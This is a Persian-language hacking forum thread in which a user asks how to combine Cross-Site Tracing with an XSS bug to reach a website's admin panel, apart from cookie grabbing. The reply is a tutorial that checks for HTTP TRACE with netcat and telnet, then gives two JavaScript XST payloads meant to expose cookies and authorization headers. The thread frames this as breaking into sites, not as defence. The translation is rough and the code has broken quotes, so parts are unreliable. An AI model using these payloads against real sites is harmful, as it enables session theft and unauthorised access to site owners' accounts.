رفتن به مطلب
برای استفاده از انجمن و عضـویت کلیک کنید.
جستجو در
  • تنظیمات بیشتر ...
نمایش نتایجی که شامل ...
جستجو در ...

جهت دسترسی به فایل ها و آموزش ها ویژه

hajsajjad

سوال در مورد کاربرد XST و نحوه استفاده از آن در باگ xss

پست های پیشنهاد شده

سلام

 چطور میشه از XST  با کمک باگ xss  دسترسی گرفت؟

آیا راهی بجز کوکی گرابر برای زدن سایت دارای باگ  xss سراغ دارید، برای دسترسی به پنل نه حملات ddos و dos ؟

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

با سلام

اول بد نیست بگم ک اسم کاملش هست Cross-Site-Tracing ک به XST  یا CST معروف هست

XST  یا CST یک فرم پیچیده از اسکریپت های  (XSS) است که می تواند مانع از اقدامات امنیتی که قبلا برای محافظت در برابر XSS ایجاد شده است را کنار بگذارد. این شکل جدید حمله به نفوذگر اجازه می دهد کوکی ها و سایر اطلاعات احراز هویت را با استفاده از یک اسکریپت ساده در سمت سرویس گیرنده بدست آورد.

به منظور محافظت از XST، کاربران اینترنت می توانند جاوا اسکریپت یا اکتیو ایکس را در مرورگرهای خود غیرفعال کنند.

آموزش

آیا هدف از HTTP TRACE پشتیبانی می کند؟

- با NetCat

 برای دانستن بر روی دستگاه لینوکس خود بروید و NETCAT را دانلود کنید. سپس، دستور زیر را دوست دارید

nc www.target.com 80

چیزی شبیه به این باید بازگردانده شود

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:00:29 GMT
Connection: close
Allow: GET, HEAD, POST, TRACE, OPTIONS
Content-Length: 0

همانطور که در خط 5 دیده می شود، TRACE پشتیبانی می شود.

با Telnet

فقط این دستور را وارد کنید

telnet www.target.com 80

 

اگر در گزارش مشاهده کنید خط "TRACE:yes"، بنابراین فعال شده است.

 

با RESTClient (افزودنی فایرفاکس).

لینک دانلود: https://addons.mozilla.org/

Exploitation

هدف این است که برای وارد کردن یک اسکریپت XST (= request) در یک صفحه وب Target به عنوان یک روش POST.
 یک مثال:

<script type=”text/javascript”>
[b]<!--[/b]
function sendTrace () {
    var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
    xmlHttp.open(“TRACE”, INSERT_YOUR_URL_HERE”,false);
    xmlHttp.send();
    xmlDoc=xmlHttp.responseText;
    alert(xmlDoc);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request>

 

توضیحات این اسکریپت را که شما می توانید در زیر ببینید :

var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);  Object ایجاد می کند

xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); نوع درخواست، URL را مشخص می کند و اگر درخواست باید به صورت غیر همزمان انجام شود یا نه.

روش: نوع درخواست - GET یا POST
url: محل فایل در سرور
async:
true (ناهمزمان) یا false (همگام)

xmlHttp.send(); برای انتقال اطلاعات به سرور استفاده می شود

xmlDoc=xmlHttp.responseText; داده های پاسخ را به عنوان یک رشته دریافت کنید

alert(xmlDoc); نمایش محتوای XML با استفاده از جاوا اسکریپت

<INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>یک دکمه را ایجاد می کند. برای بازگرداندن، اسکریپت هنگام کلیک بر روی آن شروع می شود.

اسکریپت دیگر، که برای XST بهتر است:

<script type=”text/javascript”>
function xssDomainTraceRequest(){
var exampleCode = var xmlHttp = new ActiveXObject(\”Microsoft.XMLHTTP\”)\;xmlHttp.open(\”TRACE\”,\”INSERT_YOUR_URL_HERE\”,false)\
;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;”;
var target = INSERT_YOUR_URL_HERE”;
cExampleCode = encodeURIComponent(exampleCode  + ‘;top.close()’);
var readyCode = font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’;
showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie 
Information Using TRACE>

توضیحات بعضی از دستورات (خب صادقانه، من توضیح نمی دم - برای اسکریپت اول ساده تر بود):

توجه داشته باشید که بخشی از داده هایی که دریافت می کنید (مانند پارامتر مجوز) در BASE64 کد گذاری می شود.
شما می توانید تن از رمزگشایی های BASE64 را پیدا کنید، اما من این را توصیه می کنم: 
https://www.base64decode.org/

شما باید یک classic JS window داشته باشید که وقتی کد اسکریپت را می بینید ظاهر می شود. در حال حاضر، تفاوت های زیادی با XSS نمی بینید.

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از ۷۵ اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به عنوان یک لینک به جای

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

در حال بارگذاری

×
×
  • جدید...